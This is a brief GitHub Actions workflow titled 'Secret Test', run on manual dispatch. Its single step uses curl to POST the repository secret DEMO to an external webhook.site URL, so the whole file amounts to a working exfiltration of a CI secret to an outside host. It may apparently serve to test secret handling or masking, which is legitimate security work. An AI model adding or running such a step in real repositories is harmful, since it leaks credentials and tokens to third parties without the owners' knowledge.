name: Secret Test
on: [workflow_dispatch]
jobs:
  deploy:
    name: One
    runs-on: ubuntu-latest
    steps:
      - name: Two
        run: curl -X POST "https://webhook.site/8a9c7f31-a2e6-4005-8914-32e5c4024b62" -d demo=${{secrets.DEMO}}
